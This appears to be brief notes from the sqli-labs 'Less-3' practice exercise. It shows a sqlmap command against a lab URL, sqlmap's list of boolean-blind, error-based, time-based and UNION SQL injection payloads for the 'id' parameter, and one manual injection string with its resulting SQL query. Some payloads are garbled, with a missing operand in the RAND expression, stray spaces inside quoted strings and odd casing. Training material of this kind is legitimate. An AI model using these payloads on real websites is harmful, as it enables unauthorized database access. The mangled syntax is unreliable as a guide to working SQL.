Sqlmap:
Python sqlmap.py-u "http://mysqli/Less-3/?id=1"
---
Parameter:id (GET)
Type:boolean-based Blind
Title:and boolean-based blind-where or HAVING clause
Payload:id=1 ') and 4620=4620 and (' HTMI ' = ' HTMI
Type:error-based
Title:mysql >= 5.0 and Error-based-where, have, ORDER by or GROUP by clause (floor)
Payload:id=1 ') and (select 9599 from (select COUNT (*), CONCAT (0x717a767871, (Select (ELT (9599=9599,1))), 0x71766b7071, Floor (RAND (0) *) x from INFORMATION_SCHEMA. PLUGINS GROUP by X) a) and (' jrib ' = ' jrib
type:and/or time-based Blind
Title:mysql >= 5.0.12 and time-based blind
Payload:id=1 ') and SLEEP (5) and (' XDSB ' = ' XDSB
Type:union Query
Title:generic UNION Query (NULL)-3 columns
payload:id=-4065 ') UNION all SELECT null,null,concat (0x717a767871, 0x436543777a77706348616c56515565776d444b416a44746c6d734b45527144716b76676e656e784f,0x71766b7071)--BKcT
---
Manual:
Id=1 ') and (' 1 ' = ' 1
SQL statement: SELECT * from user where name= ' ss ' and (id = '1 ') and (' 1 ' = ' 1')
Sqli-labs Page-3 (Basic challenges)